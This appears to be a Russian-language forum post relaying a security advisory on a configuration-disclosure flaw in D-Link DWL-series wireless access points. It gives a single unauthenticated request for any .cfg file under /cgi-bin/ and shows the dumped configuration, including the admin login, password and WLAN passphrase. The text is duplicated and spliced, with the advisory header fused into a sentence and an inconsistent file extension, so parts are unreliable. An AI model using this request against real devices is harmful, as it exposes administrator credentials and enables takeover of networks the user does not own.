D-Link Access-Point <= 2.10na (DWL Series) Config Disclosure Vuln
Описание:
позволяет получить всю информацию из текущего конфиг-файла, смотрим ниже
Пример/эксплоит:
При попытке HTTP-запроса к директории /cgi-bin/ сервер вернет ошибку 404(page not found)
Тjже самое и с запросом на страницу /cgi-bin/AnyFile.htm, сервер вернёт ошибку 404(page not found)
Но, при запросе на любой файл с расширением .cgf находящийся в /cgi-bin/ , сервер вернет всю конфигурацию девайса
Для примера составим следующий запрос:
Вот что у нас получилось:
Описание:
позволяет получить всю информацию из текущего конфиг-файла, смотрим ниже
Пример/эксплоит:
Код:
# ADVISORY/0206 - D-Link Wireless Access-Point (DWL-2100ap)
# INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORY
# http://www.intruders.com.br/ , http://www.intruders.org.br/При попытке HTTP-запроса к директории /cgi-bin/ сервер вернет ошибку 404(page not found)
Тjже самое и с запросом на страницу /cgi-bin/AnyFile.htm, сервер вернёт ошибку 404(page not found)
Но, при запросе на любой файл с расширением .cgf находящийся в /cgi-bin/ , сервер вернет всю конфигурацию девайса
Для примера составим следующий запрос:
Код:
http://dlink-DWL-2100ap/cgi-bin/Intruders.cfg
Код:
# Copyright (c) 2002 Atheros Communications, Inc., All Rights Reserved
# DO NOT EDIT -- This configuration file is automatically generated
magic Ar52xxAP
fwc: 34
login admin
DHCPServer
Eth_Acl
nameaddr
domainsuffix
IP_Addr 10.0.0.30
IP_Mask 255.0.0.0
Gateway_Addr 10.0.0.1
RADIUSaddr
RADIUSport 1812
RADIUSsecret
password IntrudersTest
passphrase
wlan1 passphrase AnewBadPassPhrase
# Several lines removed.